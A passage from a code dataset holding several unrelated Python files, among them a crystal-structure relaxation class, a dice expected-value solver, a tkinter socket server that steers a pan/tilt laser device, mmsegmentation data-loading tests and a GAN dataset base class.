[float(x) * alat for x in data[6:9]]\n self.structure.atoms[i_atm] = data[1]\n if i_atm == self.structure.N_atoms - 1:\n read_coords = False\n read_structure = False\n continue\n\n\n\n if line[0] == \"!\":\n energy = float(data[4])\n\n if \"Forces acting on atoms\" in line:\n read_forces = True\n read_stress = False\n continue\n \n if \"total stress\" in line:\n read_stress = True\n read_forces = False\n counter = 0\n continue\n \n if read_forces and len(data) == 9:\n if data[0] == \"atom\":\n counter += 1\n\n at_index = int(data[1]) - 1\n forces[at_index, :] = [float(x) for x in data[6:]]\n \n if counter >= self.structure.N_atoms:\n read_forces = False\n \n if read_stress and len(data) == 6:\n stress[counter, :] = [float(x) for x in data[:3]]\n counter += 1\n if counter == 3:\n got_stress = True\n read_stress = False\n\n \n # Convert to match ASE conventions\n energy *= CC.Units.RY_TO_EV\n forces *= CC.Units.RY_TO_EV / CC.Units.BOHR_TO_ANGSTROM\n stress *= CC.Units.RY_PER_BOHR3_TO_EV_PER_A3\n stress = CC.Methods.transform_voigt(stress) # To be consistent with ASE, use voigt notation\n \n print('READING RESULTS : energy = {} | job done = {}'.format(energy, job_done))\n\n # Everything went on correctly, update the results\n if job_done or got_stress:\n self.results = {\"energy\" : energy, \"forces\" : forces}\n if got_stress:\n # Use voit\n self.results.update({\"stress\" : - stress})\n else:\n self.results = None\n \n\n \n\n# Here the methods to minimize the structure with a standard calculator\nclass Relax:\n def __init__(self, structure, calculator, method = \"BFGS\", verbose = True, store_trajectory = True):\n \"\"\"\n Class that perform the structure relaxation.\n\n Parameters\n ----------\n structure : CC.Structure.Structure()\n The atomic structure\n calculator : CC.calculators.Calculator()\n The CellConstructor (or ASE) calculator.\n method : string\n The algorithm for the minimization. 
Default BFGS\n verbose : bool\n If true, prints the current total energy and forces\n store_trajector : bool\n If true, the trajectory of the minimization is saved in self.trajectory\n \"\"\"\n self.structure = structure\n self.calculator = calculator\n self.method = method\n self.verbose = verbose\n self.store_trajectory = store_trajectory\n\n self.trajectory = []\n\n # Usefull variables to track the energy and add a callback\n self.last_eval = None\n self.last_energy = None\n self.last_force = None\n self.iterations = 1\n\n \n def static_relax(self, **kwargs):\n \"\"\"\n RELAX THE STRUCTURE\n -------------------\n\n Relax the structure keeping fixed the lattice parameters using a BFGS algorithm.\n\n Parameters\n ----------\n **kwargs : \n Any optional arguments of scipy.optimize.minimize to control\n the minimization.\n\n Results\n -------\n optimized_structure : CC.Structure.Structure()\n The structure after the optimization\n \"\"\"\n\n if \"method\" in kwargs:\n self.method = kwargs[\"method\"]\n\n\n # Parse the function to match the scipy minimizer\n self.last_eval = np.zeros(self.structure.coords.ravel().shape, dtype = np.double)\n self.last_energy = 0\n self.last_force = np.zeros_like(self.last_eval)\n\n def func(x):\n if np.linalg.norm(x - self.last_eval) < 1e-16:\n return self.last_energy, self.last_force\n\n struct = self.structure.copy()\n struct.coords[:,:] = x.reshape(struct.coords.shape)\n\n energy, forces = get_energy_forces(self.calculator, struct)\n\n self.last_eval[:] = x.copy()\n self.last_energy = energy\n self.last_force[:] = -forces.ravel().copy()\n\n\n return energy, -forces.ravel()\n\n def callback(xk):\n \n if self.verbose:\n energy, force = func(xk)\n #print('it:', self.iterations)\n #print('energy:', energy)\n #print('force:', force)\n print(\"{:5d}) {:16.8f} eV {:16.8f} eV/A\".format(self.iterations, energy, np.linalg.norm(force)))\n self.iterations += 1\n \n if self.store_trajectory:\n struc = self.structure.copy()\n struc.coords[:,:] = xk.reshape(struc.coords.shape)\n self.trajectory.append(struc)\n\n if self.verbose:\n print(\"STATIC STRUCTURE RELAX\")\n print()\n print(\"{:5s} {:16s} {:16s} \".format(\"ITERS\", \"ENERGY\", \"FORCE GRAD\"))\n print(\"--------------------------------------------------\")\n\n \n res = scipy.optimize.minimize(func, self.structure.coords.ravel(), method = self.method, jac = True, callback = callback, **kwargs)\n\n if self.verbose:\n print()\n\n final_struct = self.structure.copy()\n final_struct.coords[:,:] = res.x.reshape(final_struct.coords.shape)\n self.structure = final_struct\n\n return final_struct\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"cellconstructor/calculators.py","file_name":"calculators.py","file_ext":"py","file_size_in_byte":17679,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"32507066070","text":"''' \nWrite a script that uses the API running on `localhost:8080` to build out datasets with a similar specification as `splitter.py`. Only consume data from the API that are from NY and NJ and have a sqft greater than or equal to 30000 to build your datasets. 
The directory specifications should be the same as in `splitter.py`.\n'''\n\nimport os \nimport pathlib\nfrom utils_data_manipulation import fetch_data, pydantic_converter_of, sort, list_of_agencies_in, categorize\nfrom utils_IO_bound import api_splitter\nfrom schemas import FakeEnergyFacilityModel\nfrom itertools import chain\n\nthis_dir = os.path.dirname(os.path.realpath(__file__)) \n\n\ndef main():\n    dir_filepath = pathlib.Path(this_dir) / 'project_data' / 'api_splitter'\n    list_of_states, sqft_gte_param = ['NY','NJ'], 30000\n    url = 'http://localhost:8080' + '/data/'\n    list_of_datasets = [fetch_data(url, address_contains=state, sqft_gte=sqft_gte_param) for state in list_of_states]\n    dataset = list(chain.from_iterable(list_of_datasets))\n    list_of_inst_models = pydantic_converter_of(dataset, FakeEnergyFacilityModel)\n    list_of_sorted_inst_models = sort(list_of_inst_models, 'facility_id')\n    list_of_agencies = list_of_agencies_in(list_of_sorted_inst_models)\n    categorized_dataset = categorize(list_of_sorted_inst_models, 'address', list_of_states) \n    if not dir_filepath.exists():\n        dir_filepath.mkdir()\n    api_splitter('json', list_of_agencies, categorized_dataset, dir_filepath) \n\n\nif __name__ == '__main__': \n    main() \n","repo_name":"zombie1864/data_IO_aggregation","sub_path":"src/api_splitter.py","file_name":"api_splitter.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32896370772","text":"''' calculates the expected values of different rolls. 0 represents no dice rolled again, 1 represents 1 die rolled again,\r\n2 represents a pair of 2 dice rolled again and 3 represents all dice rolled again. The method returns the expected value of\r\nall possible combinations and the corresponding dice that were rolled again'''\r\ndef roll_dice(no_of_dice_to_roll, roll):\r\n    sample_space = [1, 2, 3, 4, 5, 6]\r\n    final = []\r\n    if no_of_dice_to_roll == 0:\r\n        return [[calc_points(roll), '0']]\r\n\r\n    elif no_of_dice_to_roll == 1:\r\n        for i in range(3):\r\n            expect = 0\r\n            temp = roll.copy()\r\n            temp.pop(i)\r\n            for j in range(6):\r\n                expect += calc_points(list(temp + [sample_space[j]]))*(1/6)\r\n            final += [[expect, str(i + 1)]]\r\n        return final\r\n\r\n    elif no_of_dice_to_roll == 2:\r\n        for i in range(3):\r\n            for j in range(i, 3):\r\n                if i == j:\r\n                    continue\r\n                expect = 0\r\n                temp = roll.copy()\r\n                temp.pop(i)\r\n                temp.pop(j-1)\r\n                for k in range(6):\r\n                    for l in range(6):\r\n                        expect += calc_points(list(temp + [sample_space[k]] + [sample_space[l]])) * (1 / 36)\r\n\r\n                final += [[expect, str(i+1) + \" \" + str(j + 1)]]\r\n        return final\r\n\r\n    elif no_of_dice_to_roll == 3:\r\n        expect = 0\r\n        for i in range(6):\r\n            for j in range(6):\r\n                for k in range(6):\r\n                    temp = [sample_space[i], sample_space[j], sample_space[k]]\r\n                    expect += calc_points(temp)*(1/216)\r\n        return [[expect, \"1 2 3\"]]\r\n\r\n'''calculates the number of points for a given roll'''\r\ndef calc_points(roll):\r\n    if(roll[0] == roll[1] == roll[2]):\r\n        return 25\r\n    else:\r\n        return sum(roll)\r\n\r\n'''returns the most favourable move for a given sequence of rolls'''\r\ndef solve(roll):\r\n    chance = []\r\n    for i in range(4):\r\n        chance += roll_dice(i, roll)\r\n    return max(chance)\r\n\r\n\r\ndice1 = int(input(\"What is Roll on Dice 1? \")) #input for dice 1\r\ndice2 = int(input(\"What is Roll on Dice 2? \")) #input for dice 2\r\ndice3 = int(input(\"What is Roll on Dice 3? \")) #input for dice 3\r\nroll = [dice1,dice2,dice3]\r\nmove = solve(roll)\r\nprint(\"Roll Dice(s) No.: \" + move[1])","repo_name":"aayushshah2293/ElementsOfAI","sub_path":"GameOfChance - ExpectiMiniMax/GameOfChance.py","file_name":"GameOfChance.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"72052607092","text":"from website import create_app, db\n#from flask import render_template\n\napp = create_app()\ndb.create_all(app=create_app())\n\n\n\"\"\"@app.teardown_appcontext\ndef shutdown_session(exception=None):\n    db.session.remove()\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template('404.html'), 404\n\n@app.errorhandler(Exception)\ndef handle_exception(e):\n    print(e)\n    return render_template(\"500.html\"), 500\"\"\"\n\nif __name__ == \"__main__\":\n\n    app.run(debug=True)\n","repo_name":"jun3d4y/Self-Hosted-Notes-Web-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"30596528370","text":"# !/usr/bin/python3\r\n# -*- coding:utf-8 -*-\r\n# _*_ coding:cp1254 _*_\r\n#Ahmed Demirezen\r\n\r\n#importing library\r\nimport socket\r\nimport tkinter as tk\r\n\r\n#this step assigns the server socket variable\r\nserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\r\nclass login_panel:\r\n    def __init__(self,screen):\r\n        self.control_unit=0\r\n        self.control_unit_4panel=0\r\n\r\n        frame=tk.Frame(screen)\r\n        frame.pack()\r\n        \r\n        self.l1=tk.Label(frame,text=\"User Id:\")\r\n        self.l1.grid(row=0,column=0)\r\n        \r\n        self.e1=tk.Entry(frame)\r\n        self.e1.grid(row=0,column=1)\r\n\r\n        self.l2=tk.Label(frame,text=\"Pass:\")\r\n        self.l2.grid(row=1,column=0)\r\n\r\n        self.e2=tk.Entry(frame)\r\n        self.e2.grid(row=1,column=1)\r\n\r\n        self.b1=tk.Button(frame,text=\"Ok\",command=self.control,padx=10,pady=2)\r\n        self.b1.grid(row=3,column=0)\r\n\r\n        self.l3=tk.Label(frame)\r\n        self.l3.grid(row=4,column=0)\r\n    def control(self):#username and password are checked\r\n        if (self.e1.get()==\"admin\" and self.e2.get()==\"123\"):\r\n            print(\"\\nlogin success\")\r\n            self.control_unit=1\r\n            window.destroy()\r\n        else:\r\n            self.l3[\"text\"]=\"username or password is wrong !!!\"\r\n            print(\"\\nusername or password is wrong !!!\")\r\n\r\nclass connection:#ip and port settings \r\n    def __init__(self,screen_1):\r\n        self.control_unit_1=0\r\n        \r\n        frame=tk.Frame(screen_1)\r\n        frame.pack()\r\n\r\n        self.l3=tk.Label(frame,text=\"Ip|Port:\")\r\n        self.l3.grid(row=0,column=0)\r\n\r\n        self.l1=tk.Label(frame,text=\"Host Ip:\")\r\n        self.l1.grid(row=1,column=0)\r\n\r\n        self.e1=tk.Entry(frame)\r\n        self.e1.grid(row=1,column=1)\r\n\r\n        self.l2=tk.Label(frame,text=\"Port:\")\r\n        self.l2.grid(row=2,column=0)\r\n\r\n        self.e2=tk.Entry(frame)\r\n        self.e2.grid(row=2,column=1)\r\n\r\n        self.b1=tk.Button(frame,text=\"Ok\",padx=10,pady=2,command=self.server_c)\r\n        self.b1.grid(row=3,column=0)\r\n\r\n        self.b2=tk.Button(frame,text=\"Test\",padx=10,pady=2,command=self.ip_port)\r\n        self.b2.grid(row=3,column=1)\r\n\r\n    def ip_port(self):\r\n        self.l3[\"text\"]=\"Ip|Port:\",self.e1.get(),\"|\",self.e2.get()\r\n\r\n    def server_c(self):\r\n        try:\r\n            self.host=self.e1.get()\r\n            self.port=int(self.e2.get())\r\n\r\n            server.bind((self.host,self.port))\r\n\r\n            window_2.destroy()\r\n        except ValueError:\r\n            self.l3[\"text\"]=\"ValueError: please enter a number\"\r\n        \r\n\r\nclass control_panel:#main window\r\n    
def __init__(self,screen_2):\r\n\r\n self.laser_bool=False\r\n\r\n frame_1=tk.Frame(screen_2)\r\n frame_1.place(x=0,y=0)\r\n\r\n frame_2=tk.Frame(screen_2)\r\n frame_2.place(x=0,y=150)\r\n \r\n frame_2.focus_set()\r\n frame_2.bind(\"\",self.c_w_kb)#for the keyboard control\r\n\r\n self.s1=tk.Scale(frame_1,from_=10,to =0, orient=\"vertical\",command=self.scale_v)#vertical control scale\r\n self.s1.grid(row=0,column=0)\r\n\r\n self.s1.set(5)\r\n\r\n self.s2=tk.Scale(frame_1,from_=10,to =0, orient=\"horizontal\",command=self.scale_h)#horizontal control scale\r\n self.s2.grid(row=0,column=1)\r\n\r\n self.s2.set(5)\r\n\r\n self.l1=tk.Label(frame_2,text=\"Control with W A S D\")\r\n self.l1.grid(row=0,column=0)\r\n\r\n self.s3=tk.Scale(frame_2,from_=0,to=1,orient=\"horizontal\",command=self.laser)#laser control scale\r\n self.s3.grid(row=1,column=0)\r\n\r\n self.l2=tk.Label(frame_2,text=\"Laser\")\r\n self.l2.grid(row=1,column=1)\r\n\r\n self.b2=tk.Button(frame_1,text=(\"Close the Client\"),command=self.c_t_c)#close button\r\n self.b2.grid(row=0,column=3)\r\n\r\n self.scale_l=0\r\n \r\n def scale_v(self,angle):\r\n print(\"V \",self.s1.get())\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n\r\n def scale_h(self,angle):\r\n print(\"H \",self.s2.get())\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n\r\n def c_t_c(self):#close the client\r\n addr.send(\"close\".encode())\r\n \r\n def laser(self,angle): \r\n self.laser_m=\"laser\"+str(self.s3.get())\r\n addr.send(self.laser_m.encode())\r\n \r\n def c_w_kb(self,event):#control with keyboard\r\n self.scale_l=self.s1.get()\r\n self.scale_2=self.s2.get()\r\n \r\n \r\n \r\n if event.char==\"s\" or event.char==\"S\":\r\n if int(self.scale_l)==0:\r\n pass\r\n else:\r\n self.scale_l=self.scale_l-1\r\n self.s1.set(int(self.scale_l))\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n print(\"V \",self.s1.get())\r\n \r\n\r\n elif event.char==\"w\" or event.char==\"W\":\r\n if int(self.scale_l)==10:\r\n pass\r\n else:\r\n self.scale_l=self.scale_l+1\r\n self.s1.set(int(self.scale_l))\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n print(\"V \",self.s1.get())\r\n \r\n\r\n elif event.char==\"d\" or event.char==\"D\": \r\n if int(self.scale_2)==0:\r\n pass\r\n else:\r\n self.scale_2=self.scale_2-1\r\n self.s2.set(int(self.scale_2))\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n print(\"H \",self.s2.get())\r\n \r\n\r\n elif event.char==\"a\" or event.char==\"A\":\r\n if int(self.scale_2)==10:\r\n pass\r\n else:\r\n self.scale_2=self.scale_2+1\r\n self.s2.set(int(self.scale_2))\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n print(\"H \",self.s2.get())\r\n\r\n elif event.char==\"l\" or event.char==\"L\":\r\n \r\n if self.laser_bool==False:\r\n self.laser_bool=True\r\n self.s3.set(1)\r\n addr.send(\"laser1\".encode())\r\n elif self.laser_bool==True:\r\n self.laser_bool=False\r\n self.s3.set(0)\r\n addr.send(\"laser0\".encode())\r\n \r\n \r\n###Windows \r\nwindow=tk.Tk()\r\nwindow.geometry(\"300x100\")\r\nwindow.title(\"Login Panel\")\r\nlogin_screen=login_panel(window)\r\nwindow.mainloop()\r\n#\r\nwindow_2=tk.Tk()\r\nwindow_2.geometry(\"300x100\")\r\nwindow_2.title(\"Connection\")\r\nif (login_screen.control_unit == 1):\r\n \r\n login_screen_2=connection(window_2)\r\n login_screen_2.control_unit_1=1\r\n login_screen.control_unit_4panel=1\r\nelse:\r\n window_2.destroy()\r\nwindow_2.mainloop()\r\n##Server 
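 block: accept exactly one client (blocking) and hand it the initial command prompt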
\r\nserver.listen(1)\r\nprint(\"connection is waiting\")\r\naddr,ip = server.accept()\r\nprint(\"connection is succes\\nConnecnted ip:\",ip,addr)\r\naddr.send(\"command\".encode())\r\n##\r\n#\r\nwindow_3=tk.Tk()\r\nwindow_3.title(\"Control Panel\")\r\nwindow_3.geometry(\"300x300\")\r\ntry: \r\n if (login_screen_2.control_unit_1==1):\r\n login_screen_3=control_panel(window_3)\r\n else:\r\n window_3.destroy()\r\nexcept NameError:\r\n if (login_screen.control_unit_4panel==1):\r\n login_screen_3=control_panel(window_3)\r\n else:\r\n window_3.destroy()\r\nwindow_3.mainloop()\r\n#\r\n###\r\n","repo_name":"ahmeddemirezen/eagle-vision","sub_path":"eagle_vision_edited/server_v1.py","file_name":"server_v1.py","file_ext":"py","file_size_in_byte":7466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15192028253","text":"import copy\nimport os.path as osp\nimport tempfile\n\nimport mmcv\nimport numpy as np\nfrom mmcv.transforms import LoadImageFromFile\n\nfrom mmseg.datasets.transforms import (LoadAnnotations,\n LoadBiomedicalAnnotation,\n LoadBiomedicalData,\n LoadBiomedicalImageFromFile,\n LoadImageFromNDArray)\n\n\nclass TestLoading:\n\n @classmethod\n def setup_class(cls):\n cls.data_prefix = osp.join(osp.dirname(__file__), '../data')\n\n def test_load_img(self):\n results = dict(img_path=osp.join(self.data_prefix, 'color.jpg'))\n transform = LoadImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img_path'] == osp.join(self.data_prefix, 'color.jpg')\n assert results['img'].shape == (288, 512, 3)\n assert results['img'].dtype == np.uint8\n assert results['ori_shape'] == results['img'].shape[:2]\n assert repr(transform) == transform.__class__.__name__ + \\\n \"(ignore_empty=False, to_float32=False, color_type='color',\" + \\\n \" imdecode_backend='cv2', file_client_args={'backend': 'disk'})\"\n\n # to_float32\n transform = LoadImageFromFile(to_float32=True)\n results = transform(copy.deepcopy(results))\n assert results['img'].dtype == np.float32\n\n # gray image\n results = dict(img_path=osp.join(self.data_prefix, 'gray.jpg'))\n transform = LoadImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img'].shape == (288, 512, 3)\n assert results['img'].dtype == np.uint8\n\n transform = LoadImageFromFile(color_type='unchanged')\n results = transform(copy.deepcopy(results))\n assert results['img'].shape == (288, 512)\n assert results['img'].dtype == np.uint8\n\n def test_load_seg(self):\n seg_path = osp.join(self.data_prefix, 'seg.png')\n results = dict(\n seg_map_path=seg_path, reduce_zero_label=True, seg_fields=[])\n transform = LoadAnnotations()\n results = transform(copy.deepcopy(results))\n assert results['gt_seg_map'].shape == (288, 512)\n assert results['gt_seg_map'].dtype == np.uint8\n assert repr(transform) == transform.__class__.__name__ + \\\n \"(reduce_zero_label=True,imdecode_backend='pillow')\" + \\\n \"file_client_args={'backend': 'disk'})\"\n\n # reduce_zero_label\n transform = LoadAnnotations(reduce_zero_label=True)\n results = transform(copy.deepcopy(results))\n assert results['gt_seg_map'].shape == (288, 512)\n assert results['gt_seg_map'].dtype == np.uint8\n\n def test_load_seg_custom_classes(self):\n\n test_img = np.random.rand(10, 10)\n test_gt = np.zeros_like(test_img)\n test_gt[2:4, 2:4] = 1\n test_gt[2:4, 6:8] = 2\n test_gt[6:8, 2:4] = 3\n test_gt[6:8, 6:8] = 4\n\n tmp_dir = tempfile.TemporaryDirectory()\n img_path = osp.join(tmp_dir.name, 'img.jpg')\n gt_path = 
osp.join(tmp_dir.name, 'gt.png')\n\n mmcv.imwrite(test_img, img_path)\n mmcv.imwrite(test_gt, gt_path)\n\n # test only train with label with id 3\n results = dict(\n img_path=img_path,\n seg_map_path=gt_path,\n label_map={\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 1,\n 4: 0\n },\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n true_mask = np.zeros_like(gt_array)\n true_mask[6:8, 2:4] = 1\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, true_mask)\n\n # test only train with label with id 4 and 3\n results = dict(\n img_path=osp.join(self.data_prefix, 'color.jpg'),\n seg_map_path=gt_path,\n label_map={\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 2,\n 4: 1\n },\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n true_mask = np.zeros_like(gt_array)\n true_mask[6:8, 2:4] = 2\n true_mask[6:8, 6:8] = 1\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, true_mask)\n\n # test no custom classes\n results = dict(\n img_path=img_path,\n seg_map_path=gt_path,\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, test_gt)\n\n tmp_dir.cleanup()\n\n def test_load_image_from_ndarray(self):\n results = {'img': np.zeros((256, 256, 3), dtype=np.uint8)}\n transform = LoadImageFromNDArray()\n results = transform(results)\n\n assert results['img'].shape == (256, 256, 3)\n assert results['img'].dtype == np.uint8\n assert results['img_shape'] == (256, 256)\n assert results['ori_shape'] == (256, 256)\n\n # to_float32\n transform = LoadImageFromNDArray(to_float32=True)\n results = transform(copy.deepcopy(results))\n assert results['img'].dtype == np.float32\n\n # test repr\n transform = LoadImageFromNDArray()\n assert repr(transform) == ('LoadImageFromNDArray('\n 'ignore_empty=False, '\n 'to_float32=False, '\n \"color_type='color', \"\n \"imdecode_backend='cv2', \"\n \"file_client_args={'backend': 'disk'})\")\n\n def test_load_biomedical_img(self):\n results = dict(\n img_path=osp.join(self.data_prefix, 'biomedical.nii.gz'))\n transform = LoadBiomedicalImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img_path'] == osp.join(self.data_prefix,\n 'biomedical.nii.gz')\n assert len(results['img'].shape) == 4\n assert results['img'].dtype == np.float32\n assert results['ori_shape'] == results['img'].shape[1:]\n assert repr(transform) == ('LoadBiomedicalImageFromFile('\n \"decode_backend='nifti', \"\n 'to_xyz=False, '\n 'to_float32=True, '\n \"file_client_args={'backend': 'disk'})\")\n\n def test_load_biomedical_annotation(self):\n results = dict(\n seg_map_path=osp.join(self.data_prefix, 'biomedical_ann.nii.gz'))\n transform = LoadBiomedicalAnnotation()\n 
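# calling the transform decodes the .nii.gz annotation; the asserts below expect a 3-D float32 gt_seg_map\n        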
results = transform(copy.deepcopy(results))\n        assert len(results['gt_seg_map'].shape) == 3\n        assert results['gt_seg_map'].dtype == np.float32\n\n    def test_load_biomedical_data(self):\n        input_results = dict(\n            img_path=osp.join(self.data_prefix, 'biomedical.npy'))\n        transform = LoadBiomedicalData(with_seg=True)\n        results = transform(copy.deepcopy(input_results))\n        assert results['img_path'] == osp.join(self.data_prefix,\n                                               'biomedical.npy')\n        assert results['img'][0].shape == results['gt_seg_map'].shape\n        assert results['img'].dtype == np.float32\n        assert results['ori_shape'] == results['img'].shape[1:]\n        assert repr(transform) == ('LoadBiomedicalData('\n                                   'with_seg=True, '\n                                   \"decode_backend='numpy', \"\n                                   'to_xyz=False, '\n                                   \"file_client_args={'backend': 'disk'})\")\n\n        transform = LoadBiomedicalData(with_seg=False)\n        results = transform(copy.deepcopy(input_results))\n        assert len(results['img'].shape) == 4\n        assert results.get('gt_seg_map') is None\n        assert repr(transform) == ('LoadBiomedicalData('\n                                   'with_seg=False, '\n                                   \"decode_backend='numpy', \"\n                                   'to_xyz=False, '\n                                   \"file_client_args={'backend': 'disk'})\")\n","repo_name":"gongyan1/LIA-CAM","sub_path":"tests/test_datasets/test_loading.py","file_name":"test_loading.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42745006925","text":"def remove_vogais(texto):\n    novo = ''\n    for i in texto:\n        if i not in 'aeiou':\n            novo += i\n    return novo\n\npal = 'abacate'\n\nprint(remove_vogais(pal))","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_106/ch73_2020_07_28_04_24_37_860503.py","file_name":"ch73_2020_07_28_04_24_37_860503.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41115789591","text":"\nimport random\nimport numpy as np\nimport torch.utils.data as data\nfrom PIL import Image\nimport torchvision.transforms as transforms\nfrom abc import ABC, abstractmethod\n\n\nclass BaseDataset(data.Dataset, ABC):\n\n\n    def __init__(self, opt):\n\n        self.opt = opt\n        self.root = opt.dataroot\n\n    @staticmethod\n    def modify_commandline_options(parser, is_train):\n\n        return parser\n\n    @abstractmethod\n    def __len__(self):\n        return 0\n\n    @abstractmethod\n    def __getitem__(self, index):\n\n        pass\n\n\ndef get_params(opt, size):\n    w, h = size\n    new_h = h\n    new_w = w\n    if opt.preprocess == 'resize_and_crop':\n        new_h = new_w = opt.load_size\n    elif opt.preprocess == 'scale_width_and_crop':\n        new_w = opt.load_size\n        new_h = opt.load_size * h // w\n\n    x = random.randint(0, np.maximum(0, new_w - opt.crop_size))\n    y = random.randint(0, np.maximum(0, new_h - opt.crop_size))\n\n    vflip = random.random() > 0.5\n    hflip = random.random() > 0.5\n\n    return {'crop_pos': (x, y), 'vflip': vflip, 'hflip': hflip}\n\n\ndef get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True):\n    transform_list = []\n    if grayscale:\n        transform_list.append(transforms.Grayscale(1))\n    if 'resize' in opt.preprocess:\n        osize = [opt.load_size, opt.load_size]\n        transform_list.append(transforms.Resize(osize, method))\n    elif 'scale_width' in opt.preprocess:\n        transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, method)))\n\n    if 'crop' in opt.preprocess:\n        if params is None:\n            transform_list.append(transforms.RandomCrop(opt.crop_size))\n        else:\n            
transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))\n\n if opt.preprocess == 'none':\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method)))\n\n if not opt.no_flip:\n if params is None:\n transform_list.append(transforms.RandomHorizontalFlip())\n else:\n if params['hflip']:\n transform_list.append(transforms.Lambda(lambda img: __hflip(img, params['hflip'])))\n if params['vflip']:\n transform_list.append(transforms.Lambda(lambda img: __vflip(img, params['vflip'])))\n\n if convert:\n transform_list += [transforms.ToTensor()]\n if grayscale:\n transform_list += [transforms.Normalize((0.5,), (0.5,))]\n else:\n # pass\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\n\ndef __make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n\n __print_size_warning(ow, oh, w, h)\n return img.resize((w, h), method)\n\n\ndef __scale_width(img, target_width, method=Image.BICUBIC):\n ow, oh = img.size\n if (ow == target_width):\n return img\n w = target_width\n h = int(target_width * oh / ow)\n return img.resize((w, h), method)\n\n\ndef __crop(img, pos, size):\n ow, oh = img.size\n x1, y1 = pos\n tw = th = size\n if (ow > tw or oh > th):\n return img.crop((x1, y1, x1 + tw, y1 + th))\n return img\n\n\ndef __hflip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\n\ndef __vflip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_TOP_BOTTOM)\n return img\n\n\ndef __print_size_warning(ow, oh, w, h):\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n","repo_name":"Sheng-T/FedMGD","sub_path":"data/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"31803168219","text":"\"\"\"\nParse replica set member's mongod.log. The member must have verbose logging\nenabled like:\n\n db.adminCommand({\n setParameter: 1,\n logComponentVerbosity: {tlaPlusTrace: 1}\n })\n\"\"\"\nimport datetime\nimport heapq\nimport re\nimport sys\nfrom json import JSONDecodeError\nfrom typing import Dict\n\nimport orjson\n\nfrom repl_checker_dataclass import repl_checker_dataclass\nfrom system_state import OplogEntry, CommitPoint, ServerState, OpTime\n\n# Match lines like:\n# 2019-07-16T12:24:41.964-0400 I TLA_PLUS_TRACE [replexec-0]\n# {\"action\": \"BecomePrimaryByMagic\", ...}\nline_pat = re.compile(\n r'(?P\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}.\\d{3}[+-]\\d{4})'\n r'.+? 
